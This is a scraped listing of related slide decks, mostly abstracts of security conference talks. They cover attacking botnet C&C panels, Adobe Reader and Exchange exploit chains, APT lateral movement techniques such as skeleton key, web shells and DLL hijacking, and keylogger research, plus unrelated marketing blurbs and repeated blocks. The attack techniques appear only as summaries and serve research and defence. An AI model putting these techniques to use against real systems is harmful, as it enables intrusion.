BlackHat 2014 Briefings - Exploiting Fundamental Weaknesses in Botnet C&C Pan...Aditya K Sood
Bot herders deploy Command and Control (C&C) panels for commanding and collecting exfiltrated data from the infected hosts on the Internet. To protect C&C panels, bot herders deploy several built-in (software-centric) protection mechanisms to restrict direct access to these C&C panels. However, there exist fundamental mistakes in the design and deployment of these C&C panels that can be exploited to take complete control. This talk discusses about the methodology of launching reverse attacks on the centralized C&C panels to derive intelligence that can be used to build automated solutions. This research reveals how to detect vulnerabilities and configuration flaws in the remote C&C panels and exploit them by following the path of penetration testing. This talk is derived from the real time research in which several C&C panels were targeted and intelligence was gathered to attack the next set of C&C panels. A number of case studies will be discussed to elaborate step-by-step process of attacking and compromising C&C panels. This talk also demonstrates the use of automated tools authored for making the testing easier for the researchers.
DOWNLOAD from this link : http://secniche.org/blackhat-2014/
In this article, we discuss the design of an iframe injector used to infect web-hosting software such as cPanel in an automated manner. Several different iframe injector designs exist, but we look at one of the most basic: NiFramer.
Big problems with big data – Hadoop interfaces securitySecuRing
Did "cloud computing" and "big data" buzzwords bring new challenges for security testers?
Apart from complexity of Hadoop installations and number of interfaces, standard techniques can be applied to test for: web application vulnerabilities, SSL security and encryption at rest. We tested popular Hadoop environments and found a few critical vulnerabilities, which for sure cast a shadow on big data security.
ToorCon 14 : Malandroid : The Crux of Android InfectionsAditya K Sood
The Android platform has been plagued by malware for the past several years. Despite all attempts to detect and mitigate malicious applications on Android, malware is still flying under our radar and getting on our devices and causing millions of users financial and data loss every year. Additionally, the malware analysis community is at a large disagreement on how Android malware should be classified. In this talk, we’ll dive into the tactics, tools and procedures used by Android malware today, including several case studies of exceptional malware samples. By analyzing real code used by malware in the wild, we’ll be able to show the advancements in Android malware from a design perspective.
BlackHat Arsenal 2014 - C-SCAD : Assessing Security Flaws in C-SCAD WebX Clie...Aditya K Sood
C-SCAD is an information gathering and penetration testing tool written to assess the security issues present in the Web-X (Internet Explorer-based web interface) client used to interact with the ClearSCADA server. WebX client is hosted on the embedded web server which is shipped as a part of complete ClearSCADA architecture. Primarily, the WebX client is restricted to perform any configuration changes but it can reveal potential information about the ClearSCADA server and associated components. Insecure deployments of WebX client can reveal potential information about the various functions such as alarm pages, SQL lists, and diagnostic checks including various reports.
Abusing Adobe Reader’s JavaScript APIs by Abdul-Aziz Hariri & Brian Gorenc - ...CODE BLUE
Adobe Reader’s JavaScript APIs offer a rich set of functionality for document authors. These APIs allow for processing forms, controlling multimedia events, and communicating with databases, all of which provide end-users the ability to create complex documents. This complexity provides a perfect avenue for attackers to take advantage of weaknesses that exist in Reader’s JavaScript APIs.
In this talk, we will provide insight into both the documented and undocumented APIs available in Adobe Reader. Several code auditing techniques will be shared to aid in vulnerability discovery, along with numerous proofs-of-concept which highlight real-world examples. We’ll detail out how to chain several unique issues to obtain execution in a privileged context. Finally, we’ll describe how to construct an exploit that achieves remote code execution without the need for memory corruption.
Defeating firefox by Muneaki Nishimunea - CODE BLUE 2015CODE BLUE
The number of corporations establishing bug bounty programs in order to accomplish early discovery of vulnerabilities is increasing. So far, I have reported vulnerabilities in Firefox and received 45,000 USD (5,400,000 JPY) in bounties from the developer, which is the Mozilla Foundation. As a matter of fact, the vulnerabilities discovered in Firefox have a trend however, the awareness of the trend has not being raised among the Firefox developers and every time a new feature is implemented, a similar vulnerability is repeatedly created in the code. In this session, based on the vulnerabilities I have discovered in the past, I will introduce the patterns of vulnerabilities frequently observed in Firefox and delineate the root cause of those vulnerabilities. In addition, I will introduce my practical method that will allow you to effectively discover bugs in Firefox. This method is actually applicable not only to Firefox but any other open source software as it is based on an issue particular to open source software.
BlackHat 2014 Briefings - Exploiting Fundamental Weaknesses in Botnet C&C Pan...Aditya K Sood
Bot herders deploy Command and Control (C&C) panels for commanding and collecting exfiltrated data from the infected hosts on the Internet. To protect C&C panels, bot herders deploy several built-in (software-centric) protection mechanisms to restrict direct access to these C&C panels. However, there exist fundamental mistakes in the design and deployment of these C&C panels that can be exploited to take complete control. This talk discusses about the methodology of launching reverse attacks on the centralized C&C panels to derive intelligence that can be used to build automated solutions. This research reveals how to detect vulnerabilities and configuration flaws in the remote C&C panels and exploit them by following the path of penetration testing. This talk is derived from the real time research in which several C&C panels were targeted and intelligence was gathered to attack the next set of C&C panels. A number of case studies will be discussed to elaborate step-by-step process of attacking and compromising C&C panels. This talk also demonstrates the use of automated tools authored for making the testing easier for the researchers.
DOWNLOAD from this link : http://secniche.org/blackhat-2014/
In this article, we discuss the design of an iframe injector used to infect web-hosting software such as cPanel in an automated manner. Several different iframe injector designs exist, but we look at one of the most basic: NiFramer.
Big problems with big data – Hadoop interfaces securitySecuRing
Did "cloud computing" and "big data" buzzwords bring new challenges for security testers?
Apart from complexity of Hadoop installations and number of interfaces, standard techniques can be applied to test for: web application vulnerabilities, SSL security and encryption at rest. We tested popular Hadoop environments and found a few critical vulnerabilities, which for sure cast a shadow on big data security.
ToorCon 14 : Malandroid : The Crux of Android InfectionsAditya K Sood
The Android platform has been plagued by malware for the past several years. Despite all attempts to detect and mitigate malicious applications on Android, malware is still flying under our radar and getting on our devices and causing millions of users financial and data loss every year. Additionally, the malware analysis community is at a large disagreement on how Android malware should be classified. In this talk, we’ll dive into the tactics, tools and procedures used by Android malware today, including several case studies of exceptional malware samples. By analyzing real code used by malware in the wild, we’ll be able to show the advancements in Android malware from a design perspective.
BlackHat Arsenal 2014 - C-SCAD : Assessing Security Flaws in C-SCAD WebX Clie...Aditya K Sood
C-SCAD is an information gathering and penetration testing tool written to assess the security issues present in the Web-X (Internet Explorer-based web interface) client used to interact with the ClearSCADA server. WebX client is hosted on the embedded web server which is shipped as a part of complete ClearSCADA architecture. Primarily, the WebX client is restricted to perform any configuration changes but it can reveal potential information about the ClearSCADA server and associated components. Insecure deployments of WebX client can reveal potential information about the various functions such as alarm pages, SQL lists, and diagnostic checks including various reports.
Abusing Adobe Reader’s JavaScript APIs by Abdul-Aziz Hariri & Brian Gorenc - ...CODE BLUE
Adobe Reader’s JavaScript APIs offer a rich set of functionality for document authors. These APIs allow for processing forms, controlling multimedia events, and communicating with databases, all of which provide end-users the ability to create complex documents. This complexity provides a perfect avenue for attackers to take advantage of weaknesses that exist in Reader’s JavaScript APIs.
In this talk, we will provide insight into both the documented and undocumented APIs available in Adobe Reader. Several code auditing techniques will be shared to aid in vulnerability discovery, along with numerous proofs-of-concept which highlight real-world examples. We’ll detail out how to chain several unique issues to obtain execution in a privileged context. Finally, we’ll describe how to construct an exploit that achieves remote code execution without the need for memory corruption.
Defeating firefox by Muneaki Nishimunea - CODE BLUE 2015CODE BLUE
The number of corporations establishing bug bounty programs in order to accomplish early discovery of vulnerabilities is increasing. So far, I have reported vulnerabilities in Firefox and received 45,000 USD (5,400,000 JPY) in bounties from the developer, which is the Mozilla Foundation. As a matter of fact, the vulnerabilities discovered in Firefox have a trend however, the awareness of the trend has not being raised among the Firefox developers and every time a new feature is implemented, a similar vulnerability is repeatedly created in the code. In this session, based on the vulnerabilities I have discovered in the past, I will introduce the patterns of vulnerabilities frequently observed in Firefox and delineate the root cause of those vulnerabilities. In addition, I will introduce my practical method that will allow you to effectively discover bugs in Firefox. This method is actually applicable not only to Firefox but any other open source software as it is based on an issue particular to open source software.
[CB21] ProxyLogon is Just the Tip of the Iceberg, A New Attack Surface on Mic...CODE BLUE
Microsoft Exchange Server is an email solution widely deployed within government and enterprises, and it is an integral part of both their daily operations and security. Needless to say, vulnerabilities in Exchange have long been the Holy Grail for attackers, hence our security research on Exchange. Surprisingly, we've found not only critical vulnerabilities such as ProxyLogon, but a whole new attack surface of Exchange.
This new attack surface is based on a significant change in Exchange Server 2013, where the fundamental protocol handler, Client Access Service (CAS), splits into frontend and backend. In this fundamental change of architecture, quite an amount of design debt was incurred, and, even worse, it introduced inconsistencies between contexts, leading us to discover this new attack surface.
To unveil the beauty of this attack surface and our novel exploitation, we'll start by analyzing this architecture, followed by 7 vulnerabilities that consist of server-side bugs, client-side bugs, and crypto bugs found via this attack surface. In the end, these vulnerabilities are chained into 3 attack vectors that shine in different attack scenarios: ProxyLogon, ProxyShell, and ProxyOracle. These attack vectors enable any unauthenticated attacker to uncover plaintext passwords and even execute arbitrary code on Microsoft Exchange Servers through port 443, which is exposed to the Internet by ~400K Exchange Servers.
This attack surface has its unparalleled impact for a reason: security researchers tend to find vulnerabilities from a certain perspective, such as digging for memory bugs, injections, or logic flaws, but we took a different approach by looking at Exchange from a high-level architectural view and captured this architecture-level attack surface, which yielded multiple vulnerabilities. We hope this brings a new paradigm to vulnerability research and inspires more security researchers to look into Exchange Server. Last but not least, we'll provide hardening actions to mitigate such types of 0days in Exchange.
Secure coding is the practice of developing computer software in a way that guards against the accidental introduction of security vulnerabilities. Defects, bugs and logic flaws are consistently the primary cause of commonly exploited software vulnerabilities. Through the analysis of thousands of reported vulnerabilities, security professionals have discovered that most vulnerabilities stem from a relatively small number of common software programming errors. By identifying the insecure coding practices that lead to these errors and educating developers on secure alternatives, organizations can take proactive steps to help significantly reduce or eliminate vulnerabilities in software before deployment.
Session by: Akash S Prakash
Introduction to Web Application Security - Blackhoodie US 2018Niranjanaa Ragupathy
This slide deck is structured to start from the basics of web application security and explores common web attacks. The first half is packed with theory, while we are all for jumping into exercises having a solid grasp of the fundamentals will be crucial to your success in webappsec.
The deck dives into XSS, CSRF and SQL injections. It briefly outlines others like XXE, SSRF, logic errors, broken session management, and so on.
[CB20] Operation I am Tom: How APT actors move laterally in corporate network...CODE BLUE
TeamT5 has helped many cyber-attack victims defending against APT actors for years. We see enormous cases showing that the actors still maintained their access to the victim network after some malware cleaning by unexperienced network managers or immature security teams. The main reason would be lacking knowledge regarding threat actors’ techniques in lateral movement operations. For example, Microsoft Windows Active Directory plays a key role and dominates most corporate network environments for centralized management and authentication. However, there are many scenarios of improper security settings would cause Active Directory attacks to become a convenient way for threat actors to move around.
In this talk, we are going to present lateral movement methods to penetrate corporate network environment and techniques to bypass security monitoring systems. All cases are based on our real experiences fighting with APT actors in recent years. We categorize them into 4 categories and list the items as below:
1.AD Farm's penetration technique: mimilib, MemSSP, skeleton key, ACL abuse
2.Web-shell technique: IIS module abuse, Web source code injection, Deserialization, Rootkit
3.Second Tier backdoor techniques: DLL-hijack, IAT insert, Port reuse
4.Miscellaneous technique: how actors moving laterally in your network without malware or hacking tools.
The target audiences of this talk include security researchers, antivirus vendors, SOC team analyst and incident response teams. The techniques disclosed in this talk would help and facilitate blue team members to detect and understand threat actors’ footprints inside a corporate network and effectively block their activities.
Securing source code from loss or theft has historically been challenging due to the lack of security options available to deliver effective security without impacting developer productivity.
An Abusive Relationship with AngularJS by Mario Heiderich - CODE BLUE 2015CODE BLUE
Some voices claim that "Angular is what HTML would have been if it had been designed for building web applications". While this statement may or may not be true, is certainly accounts as one of the bolder ones a JavaScript web framework can ever issue. And where boldness is glistening like a German Bratwurst sausage in the evening sun, a critical review from a grumpy old security person shouldn’t be too far away. This talk will have a stern, very stern look at AngularJS in particular and shed light on the security aspects of this ever-popular tool. Did the super-hero framework do everything right and follow its own super-heroic principles? Does AngularJS increase or rather decrease the attack surface of a web application? How does AngularJS play along with the Content Security Policy, and was it a good idea to combine this kind of security with futuristic feature creep? And what about AngularJS version 2.0? Beware that we won’t stop at glancing at the code itself, investigating security best practices, and verifying compatibility and other common things that contribute to robust security (or lack thereof). We will cross the moral border and see if the AngularJS team could notice rogue bug tickets. A pivotal question that everyone is wondering about is: Have they successfully kept evil minds like yours truly speaker here from introducing new security bugs into the code base? This talk is a reckoning with a modern JavaScript framework that promises a lot and keeps even more, not necessarily for the best for developers and users. We will conclude in deriving a general lesson learnt and hopefully agree that progress doesn't invariably mean an enhancement.
[CB21] ProxyLogon is Just the Tip of the Iceberg, A New Attack Surface on Mic...CODE BLUE
Microsoft Exchange Server is an email solution widely deployed within government and enterprises, and it is an integral part of both their daily operations and security. Needless to say, vulnerabilities in Exchange have long been the Holy Grail for attackers, hence our security research on Exchange. Surprisingly, we've found not only critical vulnerabilities such as ProxyLogon, but a whole new attack surface of Exchange.
This new attack surface is based on a significant change in Exchange Server 2013, where the fundamental protocol handler, Client Access Service (CAS), splits into frontend and backend. In this fundamental change of architecture, quite an amount of design debt was incurred, and, even worse, it introduced inconsistencies between contexts, leading us to discover this new attack surface.
To unveil the beauty of this attack surface and our novel exploitation, we'll start by analyzing this architecture, followed by 7 vulnerabilities that consist of server-side bugs, client-side bugs, and crypto bugs found via this attack surface. In the end, these vulnerabilities are chained into 3 attack vectors that shine in different attack scenarios: ProxyLogon, ProxyShell, and ProxyOracle. These attack vectors enable any unauthenticated attacker to uncover plaintext passwords and even execute arbitrary code on Microsoft Exchange Servers through port 443, which is exposed to the Internet by ~400K Exchange Servers.
This attack surface has its unparalleled impact for a reason: security researchers tend to find vulnerabilities from a certain perspective, such as digging for memory bugs, injections, or logic flaws, but we took a different approach by looking at Exchange from a high-level architectural view and captured this architecture-level attack surface, which yielded multiple vulnerabilities. We hope this brings a new paradigm to vulnerability research and inspires more security researchers to look into Exchange Server. Last but not least, we'll provide hardening actions to mitigate such types of 0days in Exchange.
Secure coding is the practice of developing computer software in a way that guards against the accidental introduction of security vulnerabilities. Defects, bugs and logic flaws are consistently the primary cause of commonly exploited software vulnerabilities. Through the analysis of thousands of reported vulnerabilities, security professionals have discovered that most vulnerabilities stem from a relatively small number of common software programming errors. By identifying the insecure coding practices that lead to these errors and educating developers on secure alternatives, organizations can take proactive steps to help significantly reduce or eliminate vulnerabilities in software before deployment.
Session by: Akash S Prakash
Introduction to Web Application Security - Blackhoodie US 2018Niranjanaa Ragupathy
This slide deck is structured to start from the basics of web application security and explores common web attacks. The first half is packed with theory, while we are all for jumping into exercises having a solid grasp of the fundamentals will be crucial to your success in webappsec.
The deck dives into XSS, CSRF and SQL injections. It briefly outlines others like XXE, SSRF, logic errors, broken session management, and so on.
[CB20] Operation I am Tom: How APT actors move laterally in corporate network...CODE BLUE
TeamT5 has helped many cyber-attack victims defending against APT actors for years. We see enormous cases showing that the actors still maintained their access to the victim network after some malware cleaning by unexperienced network managers or immature security teams. The main reason would be lacking knowledge regarding threat actors’ techniques in lateral movement operations. For example, Microsoft Windows Active Directory plays a key role and dominates most corporate network environments for centralized management and authentication. However, there are many scenarios of improper security settings would cause Active Directory attacks to become a convenient way for threat actors to move around.
In this talk, we are going to present lateral movement methods to penetrate corporate network environment and techniques to bypass security monitoring systems. All cases are based on our real experiences fighting with APT actors in recent years. We categorize them into 4 categories and list the items as below:
1.AD Farm's penetration technique: mimilib, MemSSP, skeleton key, ACL abuse
2.Web-shell technique: IIS module abuse, Web source code injection, Deserialization, Rootkit
3.Second Tier backdoor techniques: DLL-hijack, IAT insert, Port reuse
4.Miscellaneous technique: how actors moving laterally in your network without malware or hacking tools.
The target audiences of this talk include security researchers, antivirus vendors, SOC team analyst and incident response teams. The techniques disclosed in this talk would help and facilitate blue team members to detect and understand threat actors’ footprints inside a corporate network and effectively block their activities.
Securing source code from loss or theft has historically been challenging due to the lack of security options available to deliver effective security without impacting developer productivity.
An Abusive Relationship with AngularJS by Mario Heiderich - CODE BLUE 2015CODE BLUE
Some voices claim that "Angular is what HTML would have been if it had been designed for building web applications". While this statement may or may not be true, is certainly accounts as one of the bolder ones a JavaScript web framework can ever issue. And where boldness is glistening like a German Bratwurst sausage in the evening sun, a critical review from a grumpy old security person shouldn’t be too far away. This talk will have a stern, very stern look at AngularJS in particular and shed light on the security aspects of this ever-popular tool. Did the super-hero framework do everything right and follow its own super-heroic principles? Does AngularJS increase or rather decrease the attack surface of a web application? How does AngularJS play along with the Content Security Policy, and was it a good idea to combine this kind of security with futuristic feature creep? And what about AngularJS version 2.0? Beware that we won’t stop at glancing at the code itself, investigating security best practices, and verifying compatibility and other common things that contribute to robust security (or lack thereof). We will cross the moral border and see if the AngularJS team could notice rogue bug tickets. A pivotal question that everyone is wondering about is: Have they successfully kept evil minds like yours truly speaker here from introducing new security bugs into the code base? This talk is a reckoning with a modern JavaScript framework that promises a lot and keeps even more, not necessarily for the best for developers and users. We will conclude in deriving a general lesson learnt and hopefully agree that progress doesn't invariably mean an enhancement.
The Business Side of Windows 10 Apps - MS NetWork6Alan Mendelevich
Windows 10 opens the widest spectrum of devices to run your apps on. This provides tremendous opportunities but at the same time presents challenges of exposing your app to a mix of different types of users and monetizing it in such a diverse universe of usage scenarios. In this talk we will look at the ways of tackling just that.
8 Ways a Digital Media Platform is More Powerful than “Marketing”New Rainmaker
You may have heard that “media not marketing” is the future of online business … but what does that actually mean, what can it look like?
As you’ll see in this SlideShare, examples of a media-first approach done very well are all around us, it only takes a simple shift in thinking to see them.
Can this "media not marketing" approach to building an audience have an actual effect on the bottom line revenue of your business, or is it just more philosophical wordplay?
Let's find out ...
SlideShare now has a player specifically designed for infographics. Upload your infographics now and see them take off! Need advice on creating infographics? This presentation includes tips for producing stand-out infographics. Read more about the new SlideShare infographics player here: http://wp.me/p24NNG-2ay
This infographic was designed by Column Five: http://columnfivemedia.com/
No need to wonder how the best on SlideShare do it. The Masters of SlideShare provides storytelling, design, customization and promotion tips from 13 experts of the form. Learn what it takes to master this type of content marketing yourself.
10 Ways to Win at SlideShare SEO & Presentation OptimizationOneupweb
Thank you, SlideShare, for teaching us that PowerPoint presentations don't have to be a total bore. But in order to tap SlideShare's 60 million global users, you must optimize. Here are 10 quick tips to make your next presentation highly engaging, shareable and well worth the effort.
For more content marketing tips: http://www.oneupweb.com/blog/
Are you new to SlideShare? Are you looking to fine tune your channel plan? Are you using SlideShare but are looking for ways to enhance what you're doing? How can you use SlideShare for content marketing tactics such as lead generation, calls-to-action to other pieces of your content, or thought leadership? Read more from the CMI team in their latest SlideShare presentation on SlideShare.
Each month, join us as we highlight and discuss hot topics ranging from the future of higher education to wearable technology, best productivity hacks and secrets to hiring top talent. Upload your SlideShares, and share your expertise with the world!
Not sure what to share on SlideShare?
SlideShares that inform, inspire and educate attract the most views. Beyond that, ideas for what you can upload are limitless. We’ve selected a few popular examples to get your creative juices flowing.
How to Make Awesome SlideShares: Tips & TricksSlideShare
Turbocharge your online presence with SlideShare. We provide the best tips and tricks for succeeding on SlideShare. Get ideas for what to upload, tips for designing your deck and more.
A Survey of Keylogger in Cybersecurity Educationijtsrd
Keylogger applications try to retrieve exclusive statistics through covertly shooting consumer enter through keystroke tracking after which relaying these statistics to others, frequently for malicious purposes. Keyloggers hence pose a chief danger to commercial enterprise and private sports consisting of Internet transactions, online banking, email, or chat. To cope with such threats, now no longer most effective ought to customers be made aware of this form of malware, however software program practitioners and college students ought to additionally be knowledgeable withinside the layout, implementation, and tracking of powerful defenses towards distinctive keylogger attacks. This paper affords a case for incorporating keylogging in cybersecurity schooling. First, the paper affords a top level view of keylogger applications, discusses keylogger layout, implementation, and utilization, and affords powerful tactics to hit upon and save you keylogging attacks. Second, the paper outlines numerous keylogging tasks that may be integrated into an undergraduate computing software to train the subsequent technology of cybersecurity practitioners on this crucial topic. Raja Saha | Dr. Umarani Chellapandy "A Survey of Keylogger in Cybersecurity Education" Published in International Journal of Trend in Scientific Research and Development (ijtsrd), ISSN: 2456-6470, Volume-6 | Issue-3 , April 2022, URL: https://www.ijtsrd.com/papers/ijtsrd49471.pdf Paper URL: https://www.ijtsrd.com/computer-science/computer-security/49471/a-survey-of-keylogger-in-cybersecurity-education/raja-saha
How to 2FA-enable Open Source Applications (Extended Session)
Presented at: Open Source 101 at Home 2020
Presented by: Mike Schwartz, Gluu
Abstract: Your organization loves open source tools like Wordpress, SuiteCRM, NextCloud, RocketChat, and OnlyOffice... but most of these tools are protected with plain old passwords. You want to use two-factor authentication... but how? In this workshop, you'll learn:
- Which 2FA technologies can be used without paying a license;
- How to enable users to enroll and delete 2FA credentials;
- How to configure open source applications to act as a federated relying party--delegating authentication to a central service
- How custom applications can act as a federated relying party
Security has been identified as the major concern for the agent paradigm for two reasons. First, foreign code that executes on a site shares that site's services and resources with local processes and other agents. Services can include electronic commerce utilities. Resources include the file system, the GUI and the network server, as well as memory and CPU. It is difficult for a site to ensure that no agent can steal information or corrupt another agent or shared resource. The second security problem is that the agent itself can be circumvented by a malicious site which may steal or corrupt agent data or simply destroy the agent. To solve this problems we build a mini–password manager using a code in language Java. Then we incorporate the mini–password manager into the simple web server to authenticate users that would like to download documents and resources. The goal of this paper is to accentuate the positive aspects that agents bring to Internet security.
Messages addressed to specific users can be decrypted by Key Generation Centre (KGC) by generating their private keys. Data owner wants the data to be delivered only to specified user and not to unauthorized person that is the data owner makes their private data accessible only to authorized person. We propose attribute based encryption and escrow problem which means written agreement delivered to a third party to overcome this problem. Attribute based Encryption (ABE) is a type of public-key encryption in which the private key of a user and the cipher text are dependent upon attributes. It is a promising cryptographic approach.
Implementation of user authentication as a service for cloud networkSalam Shah
There are so many security risks for the users of cloud computing, but still the organizations are switching towards the cloud. The cloud provides data protection and a huge amount of memory usage remotely or virtually. The organization has not adopted the cloud computing completely due to some security issues. The research in cloud computing has more focus on privacy and security in the new categorization attack surface. User authentication is the additional overhead for the companies besides the management of availability of cloud services. This paper is based on the proposed model to provide central authentication technique so that secured access of resources can be provided to users instead of adopting some unordered user authentication techniques. The model is also implemented as a prototype.
International Refereed Journal of Engineering and Science (IRJES)irjes
International Refereed Journal of Engineering and Science (IRJES) is a leading international journal for publication of new ideas, the state of the art research results and fundamental advances in all aspects of Engineering and Science. IRJES is a open access, peer reviewed international journal with a primary objective to provide the academic community and industry for the submission of half of original research and applications
Describe briefly the OSI Reference model and its relevance to computer security. [4 Marks]
• Ans 1: The Open System Interconnection Model (OSI) is a standardized framework for describing how computers communicate with each other over a network system. The OSI model also conceptualizes how data flows through a stack of seven layers, beginning with the physical layer and continuing through the datalink, network, transport, session, presentation, and finally the application layer (Simoneau, 2006)
1croreprojects is the best hybrid cloud system for all area and also developing realtime projects, phd projects are fully developed in our institute. We have been effectively in providing solutions for different challenges across a wide range of market and customers propagate across the globe.
Identity theft through keyloggers has become very popular the last years. One of the most common ways to intercept and steal victim's data are to use a keylogger that transfers data back to the attacker. Covert keyloggers exist either as hardware or software. In the former case they are introduced as devices that can be attached to a computer (e.g. USB sticks), while in the latter case they try to stay invisible and undetectable as a software in the operating system. Writing a static keylogger which operates locally in victim's machine is not very complex. In contrast, the creation of covert communication between the attacker and the victim, and still remain undetectable is more sophisticated. In such a scenario we have to define how data can be delivered to the attacker and how we can make an efficient use of the channel that transfers the information over the network in order to stay undetectable. In this paper we propose a system based on Steganography that takes advantage of a seemingly innocuous Social Network (Tumblr) in order to avoid direct communication between the victim and the attacker. A core part of this study is the security analysis which is also discussed by presenting experimental results of the system and describing issues regarding surveillance resistance of the system as well as limitations.
Web application vulnerabilities involve a system flaw or weakness in a web-based application. They have been around for years, largely due to not validating or sanitizing form inputs, misconfigured web servers, and application design flaws, and they can be exploited to compromise the application's security.
Welcome to the next edition of our Monthly Digest, your one-stop resource for staying informed on the most recent developments, insights, and best practices in the ever-evolving field of security. In this issue, we have curated a diverse collection of articles, news, and research findings tailored to both professionals and casual enthusiasts. Our digest aims to make our content is both engaging and accessible. Happy reading
(https://boosty.to/overkill_security + check original source urls inside)
Similar to Abusing Glype Proxies - Attacks, Exploits and Defences (20)
Emerging Trends in Online Social Networks MalwareAditya K Sood
Emerging trends in Social Networks Malware.
Social networks, such as Facebook, Twitter, and others pose a grave
threat to the security and privacy of users. This presentation highlights malware infection strategies
used by attackers to infect social networking websites and addresses security from the user
perspectives—outlining effective, secure steps that can reduce the impact of malware infections
Enfilade: Tool to Detect Infections in MongoDB InstancesAditya K Sood
Attackers are targeting MongoDB instances for conducting nefarious operations on the Internet. The cybercriminals are targeting exposed MongoDB instances and trigger infections at scale to exfiltrate data, destruct data, and extort money via ransom.
Detecting Ransomware/Bot Infections in ElasticsearchAditya K Sood
Elasticsearch infections are rising exponentially. The adversaries are exploiting open and exposed Elasticsearch interfaces to trigger infections in the cloud and non-cloud deployments. During this talk, we will release a tool named "STRAFER" to detect potential infections in the Elasticsearch instances. The tool allows security researchers, penetration testers, and threat intelligence experts to detect compromised and infected Elasticsearch instances running malicious code. The tool also enables you to conduct efficient research in the field of malware targeting cloud databases.
CrossTalk - The Art of Cyber Bank Robbery - Stealing your Money Through Insid...Aditya K Sood
Cyber criminals are using advanced attacks to exploit online banking systems and services to covertly steal money. This paper describes the tactics currently used by cyber criminals to conduct cyber bank robbery
GraphRAG is All You need? LLM & Knowledge GraphGuy Korland
Guy Korland, CEO and Co-founder of FalkorDB, will review two articles on the integration of language models with knowledge graphs.
1. Unifying Large Language Models and Knowledge Graphs: A Roadmap.
https://arxiv.org/abs/2306.08302
2. Microsoft Research's GraphRAG paper and a review paper on various uses of knowledge graphs:
https://www.microsoft.com/en-us/research/blog/graphrag-unlocking-llm-discovery-on-narrative-private-data/
Alt. GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using ...James Anderson
Effective Application Security in Software Delivery lifecycle using Deployment Firewall and DBOM
The modern software delivery process (or the CI/CD process) includes many tools, distributed teams, open-source code, and cloud platforms. Constant focus on speed to release software to market, along with the traditional slow and manual security checks has caused gaps in continuous security as an important piece in the software supply chain. Today organizations feel more susceptible to external and internal cyber threats due to the vast attack surface in their applications supply chain and the lack of end-to-end governance and risk management.
The software team must secure its software delivery process to avoid vulnerability and security breaches. This needs to be achieved with existing tool chains and without extensive rework of the delivery processes. This talk will present strategies and techniques for providing visibility into the true risk of the existing vulnerabilities, preventing the introduction of security issues in the software, resolving vulnerabilities in production environments quickly, and capturing the deployment bill of materials (DBOM).
Speakers:
Bob Boule
Robert Boule is a technology enthusiast with PASSION for technology and making things work along with a knack for helping others understand how things work. He comes with around 20 years of solution engineering experience in application security, software continuous delivery, and SaaS platforms. He is known for his dynamic presentations in CI/CD and application security integrated in software delivery lifecycle.
Gopinath Rebala
Gopinath Rebala is the CTO of OpsMx, where he has overall responsibility for the machine learning and data processing architectures for Secure Software Delivery. Gopi also has a strong connection with our customers, leading design and architecture for strategic implementations. Gopi is a frequent speaker and well-known leader in continuous delivery and integrating security into software delivery.
Securing your Kubernetes cluster_ a step-by-step guide to success !KatiaHIMEUR1
Today, after several years of existence, an extremely active community and an ultra-dynamic ecosystem, Kubernetes has established itself as the de facto standard in container orchestration. Thanks to a wide range of managed services, it has never been so easy to set up a ready-to-use Kubernetes cluster.
However, this ease of use means that the subject of security in Kubernetes is often left for later, or even neglected. This exposes companies to significant risks.
In this talk, I'll show you step-by-step how to secure your Kubernetes cluster for greater peace of mind and reliability.
SAP Sapphire 2024 - ASUG301 building better apps with SAP Fiori.pdfPeter Spielvogel
Building better applications for business users with SAP Fiori.
• What is SAP Fiori and why it matters to you
• How a better user experience drives measurable business benefits
• How to get started with SAP Fiori today
• How SAP Fiori elements accelerates application development
• How SAP Build Code includes SAP Fiori tools and other generative artificial intelligence capabilities
• How SAP Fiori paves the way for using AI in SAP apps
A tale of scale & speed: How the US Navy is enabling software delivery from l...sonjaschweigert1
Rapid and secure feature delivery is a goal across every application team and every branch of the DoD. The Navy’s DevSecOps platform, Party Barge, has achieved:
- Reduction in onboarding time from 5 weeks to 1 day
- Improved developer experience and productivity through actionable findings and reduction of false positives
- Maintenance of superior security standards and inherent policy enforcement with Authorization to Operate (ATO)
Development teams can ship efficiently and ensure applications are cyber ready for Navy Authorizing Officials (AOs). In this webinar, Sigma Defense and Anchore will give attendees a look behind the scenes and demo secure pipeline automation and security artifacts that speed up application ATO and time to production.
We will cover:
- How to remove silos in DevSecOps
- How to build efficient development pipeline roles and component templates
- How to deliver security artifacts that matter for ATO’s (SBOMs, vulnerability reports, and policy evidence)
- How to streamline operations with automated policy checks on container images
Essentials of Automations: The Art of Triggers and Actions in FMESafe Software
In this second installment of our Essentials of Automations webinar series, we’ll explore the landscape of triggers and actions, guiding you through the nuances of authoring and adapting workspaces for seamless automations. Gain an understanding of the full spectrum of triggers and actions available in FME, empowering you to enhance your workspaces for efficient automation.
We’ll kick things off by showcasing the most commonly used event-based triggers, introducing you to various automation workflows like manual triggers, schedules, directory watchers, and more. Plus, see how these elements play out in real scenarios.
Whether you’re tweaking your current setup or building from the ground up, this session will arm you with the tools and insights needed to transform your FME usage into a powerhouse of productivity. Join us to discover effective strategies that simplify complex processes, enhancing your productivity and transforming your data management practices with FME. Let’s turn complexity into clarity and make your workspaces work wonders!
Removing Uninteresting Bytes in Software FuzzingAftab Hussain
Imagine a world where software fuzzing, the process of mutating bytes in test seeds to uncover hidden and erroneous program behaviors, becomes faster and more effective. A lot depends on the initial seeds, which can significantly dictate the trajectory of a fuzzing campaign, particularly in terms of how long it takes to uncover interesting behaviour in your code. We introduce DIAR, a technique designed to speedup fuzzing campaigns by pinpointing and eliminating those uninteresting bytes in the seeds. Picture this: instead of wasting valuable resources on meaningless mutations in large, bloated seeds, DIAR removes the unnecessary bytes, streamlining the entire process.
In this work, we equipped AFL, a popular fuzzer, with DIAR and examined two critical Linux libraries -- Libxml's xmllint, a tool for parsing xml documents, and Binutil's readelf, an essential debugging and security analysis command-line tool used to display detailed information about ELF (Executable and Linkable Format). Our preliminary results show that AFL+DIAR does not only discover new paths more quickly but also achieves higher coverage overall. This work thus showcases how starting with lean and optimized seeds can lead to faster, more comprehensive fuzzing campaigns -- and DIAR helps you find such seeds.
- These are slides of the talk given at IEEE International Conference on Software Testing Verification and Validation Workshop, ICSTW 2022.
State of ICS and IoT Cyber Threat Landscape Report 2024 previewPrayukth K V
